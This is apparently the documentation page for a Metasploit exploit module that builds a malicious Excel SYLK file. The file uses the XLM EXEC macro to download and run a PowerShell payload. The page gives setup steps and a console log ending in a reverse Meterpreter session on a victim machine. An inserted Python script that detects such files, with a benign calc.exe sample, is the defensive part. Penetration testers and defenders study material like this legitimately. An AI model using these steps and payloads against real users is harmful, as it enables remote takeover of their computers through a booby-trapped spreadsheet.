metasploit-gs/documentation/modules/exploit/windows/fileformat/office_excel_slk.md

## Introduction
The .slk (SYLK) file format used by Microsoft Excel can execute local commands via the Excel 4.0 macro function `EXEC`, which is stored in the file as an `E` (expression) cell field, e.g. `EEXEC(cmd)`.
This module takes advantage of this 'feature' to run a download-and-execute PowerShell command in order to spawn a session
on the target.
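As an added example (not part of the module or its documentation), the following Python script parses SYLK records the way a detection engineer would when triaging a suspicious .slk: it honours the `;;` escape for a literal semicolon, flags the `O;E` macro-sheet record, an `Auto_open`/`Auto_close` name record, and any `E` expression cell calling `EXEC` or a similar function. The sample file is constructed here for illustration and is not the module's generated output; the list of "dangerous" functions is an assumption chosen for this example.

```python
import re

# Constructed sample (illustration only, not the module's generated file):
# a minimal SYLK macro sheet whose Auto_open name points at a cell calling EXEC.
SAMPLE_SLK = """ID;PWXL;N;E
O;E
NN;NAuto_open;ER101C1;KOut;F
C;X1;Y101;K0;EEXEC("calc.exe")
C;X1;Y102;K0;EHALT()
E
"""

# Excel 4.0 macro functions that reach outside the workbook (assumed list).
DANGEROUS_FUNCS = ("EXEC", "CALL", "REGISTER", "FOPEN", "FWRITE")
AUTO_NAMES = ("auto_open", "auto_close")


def split_fields(line):
    """Split one SYLK record on ';', honouring the ';;' escape for a literal ';'."""
    fields, cur, i = [], [], 0
    while i < len(line):
        ch = line[i]
        if ch == ";":
            if line[i + 1:i + 2] == ";":
                cur.append(";")
                i += 2
                continue
            fields.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
        i += 1
    fields.append("".join(cur))
    return fields


def scan_slk(text):
    """Return (line_no, indicator, detail) tuples for suspicious SYLK records."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = split_fields(raw)
        rtype = fields[0]
        if rtype == "O" and "E" in fields[1:]:
            # O;E marks the sheet as a macro sheet, a prerequisite for XLM execution
            findings.append((line_no, "macro-sheet", "O;E"))
        elif rtype == "NN":
            # NN records define names; Auto_open makes Excel run the target on open
            for f in fields[1:]:
                if f[:1] == "N" and f[1:].lower() in AUTO_NAMES:
                    findings.append((line_no, "auto-run-name", f[1:]))
        elif rtype == "C":
            # C records are cells; the E field holds a formula/macro expression
            for f in fields[1:]:
                if f[:1] != "E":
                    continue
                expr = f[1:]
                if any(re.search(r"\b%s\s*\(" % func, expr, re.I) for func in DANGEROUS_FUNCS):
                    findings.append((line_no, "macro-call", expr))
    return findings


def is_suspicious(text):
    """True when the file has both an auto-run hook and a dangerous macro call."""
    kinds = {f[1] for f in scan_slk(text)}
    return "auto-run-name" in kinds and "macro-call" in kinds


if __name__ == "__main__":
    for line_no, kind, detail in scan_slk(SAMPLE_SLK):
        print("line %d: %s: %s" % (line_no, kind, detail))
    print("suspicious:", is_suspicious(SAMPLE_SLK))
```

Run it against a quarantined .slk with `scan_slk(open(path).read())`; a hit on both `auto-run-name` and `macro-call` is a strong signal, while a lone `macro-sheet` record on its own is common in legitimate exports and should only raise the priority of the other indicators.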
## Vulnerable Application
Microsoft Excel (tested on Excel 2016)
## Verification Steps
1. Start `msfconsole`
2. `use exploit/windows/fileformat/office_excel_slk`
3. `set LHOST [IP]`
4. `set SRVHOST [IP]`
5. `run`
6. Open the generated file in Excel and click 'Enable Content'
## Options
**FILENAME**
The name of the generated .slk file. Default is a randomly generated file name.
## Scenarios
### Microsoft Excel 2016 on Windows 10 Build 17763.288
```
msf > use exploit/windows/fileformat/office_excel_slk
msf exploit(office_excel_slk) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_excel_slk) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_excel_slk) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_excel_slk) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/carter/.msf4/local/msf.slk
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
```
Once the victim opens the file and clicks 'Enable Content', a session should spawn:
```
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2019-01-13 16:00:49 -0500
```